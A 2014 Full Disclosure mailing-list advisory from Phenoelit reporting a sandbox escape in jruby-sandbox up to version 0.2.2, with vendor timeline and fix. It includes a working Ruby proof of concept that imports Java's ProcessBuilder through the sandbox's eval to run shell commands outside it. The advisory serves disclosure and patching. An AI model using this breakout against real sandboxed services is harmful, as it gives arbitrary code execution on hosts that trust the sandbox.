[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [FD] Advisory: jruby-sandbox Breakout
From:       joernchen <joernchen () phenoelit ! de>
Date:       2014-04-24 16:43:11
Message-ID: 20140424164311.GA15524 () localhost ! Speedport_W_722V_Typ_B
[Download RAW message or body]

Hi,

FYI, see attached.

cheers,

joernchen
-- 
joernchen ~ Phenoelit
<joernchen@phenoelit.de> ~ C776 3F67 7B95 03BF 5344
http://www.phenoelit.de  ~ A46A 7199 8B7B 756A F5AC

["jruby-sandbox.txt" (text/plain)]

Phenoelit Advisory <wir-haben-auch-mal-was-gefunden #0815 +-+++>

[ Authors ]
        joernchen       <joernchen () phenoelit de>

        Phenoelit Group (http://www.phenoelit.de)

[ Affected Products ]
        jruby-sandbox <= 0.2.2
        https://github.com/omghax/jruby-sandbox

[ Vendor communication ]
        2014-04-22 Send vulnerability details to project maintainer
        2014-04-24 Requesting confirmation that details were received
        2014-04-24 Maintainer states he is working on a test case
        2014-04-24 Maintainer releases fixed version
        2014-04-24 Release of this advisory

[ Description ]
        jruby-sandbox aims to allow safe execution of user given Ruby
        code within a JRuby [0] runtime. However via import of Java 
        classes it is possible to circumvent those protections and 
        execute arbitrary code outside the sandboxed environment.

[ Example ]

require 'sandbox'
sand = Sandbox.safe
sand.activate!

begin
  sand.eval("print `id`")
rescue Exception => e
  puts "fail via Ruby ;)"
end
puts "Now for some Java"

sand.eval("Kernel.send :java_import, 'java.lang.ProcessBuilder'")
sand.eval("Kernel.send :java_import, 'java.util.Scanner'")
sand.eval("s = Java::java.util.Scanner.new( " + 
          "Java::java.lang.ProcessBuilder.new('sh','-c','id')" + 
          ".start.getInputStream  ).useDelimiter(\"\x00\").next")
sand.eval("print s")

[ Solution ]
        Upgrade to version 0.2.3

[ References ]
        [0] http://jruby.org/

[ end of file ]


_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[prev in list] [next in list] [prev in thread] [next in thread]

Configure | About | News | Add a list | Sponsored by KoreLogic